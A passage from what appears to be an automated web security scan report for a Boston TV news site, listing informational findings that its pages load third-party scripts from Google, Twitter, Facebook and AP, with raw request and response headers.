Expires: Mon, 24 Jan 2011 23:54:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21627
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Hiller Instinct</title>
<meta name="publisher" content="New England News Station
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1512. http://www1.whdh.com/features/main/holiday_helping/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/features/main/holiday_helping/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /features/main/holiday_helping/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:27 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2969
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:46:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22218
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Holiday Helping</title>
<meta name="publisher" content="New England News Station Bos
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1513. http://www1.whdh.com/jobs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/jobs/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /jobs/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:58:05 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=2718
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:42:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14859
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV 7NEWS NBC - Job Postings</title>
<meta name="publisher" content="New England
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1514. http://www1.whdh.com/jobs/internships previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/jobs/internships

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /jobs/internships HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

21.1515. http://www1.whdh.com/livesky7/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/livesky7/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /livesky7/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:13 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=6060
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:37:25 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11359
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Track Sky7</title>
<meta name="publisher" content="New England News Station Boston C
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1516. http://www1.whdh.com/news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003332148088/woman-calls-911-over-bad-manicure/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:42:58 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1693
Cache-Control: max-age=17141
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:27:50 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107114 (MII-APC/1.6)
Content-Length: 18886
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Woman calls 911 over bad manicure</title>
<meta name="publisher" content="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1517. http://www1.whdh.com/news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003343780281/st-paul-bar-to-roast-bear-for-packers-bears-game/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1251
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:31:14 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17395
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bar to roast bear for Packers-Bears game</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1518. http://www1.whdh.com/news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003351604328/teens-allegedly-rob-motorists-stuck-in-snow/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:41 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=24129
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:38:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17127
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Teens allegedly rob motorists stuck in snow</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1519. http://www1.whdh.com/news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003356995419/fla-man-lets-son-drive-because-he-was-too-drunk/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:42:24 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 849
Cache-Control: max-age=28020
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:28:35 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107003 (MII-APC/1.6)
Content-Length: 16994
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Fla. man lets son drive because he was too drunk</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1520. http://www1.whdh.com/news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/bizarre/12003358171121/vt-woman-facing-charges-for-overdue-library-items/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=23710
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:30:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 16865
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Vt. woman facing charges for overdue library items</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1521. http://www1.whdh.com/news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359461248/rocker-bret-michaels-scheduled-for-surgery/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:15 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37296
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:17:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19494
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Rocker Bret Michaels scheduled for surgery</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1522. http://www1.whdh.com/news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359469757/leno-named-hasty-pudding-man-of-the-year/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 40
Cache-Control: max-age=37453
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:18:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 19483
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Leno named Hasty Pudding man of the Year</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1523. http://www1.whdh.com/news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/entertainment/12003359478573/aguilera-to-sing-national-anthem-at-super-bowl/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38021
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:29:20 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19388
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Aguilera to sing national anthem at Super Bowl</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1524. http://www1.whdh.com/news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003336251130/crews-rescue-car-from-icy-waters-in-scituate/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=27246
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:29:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21428
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Crews rescue car from icy waters in Scituate</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1525. http://www1.whdh.com/news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003336556294/mbta-uses-cameras-to-crack-down-on-fake-injury-claims/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:50 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=31491
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:39:52 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22522
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - MBTA uses cameras to crack down on fake injury claims</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1526. http://www1.whdh.com/news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

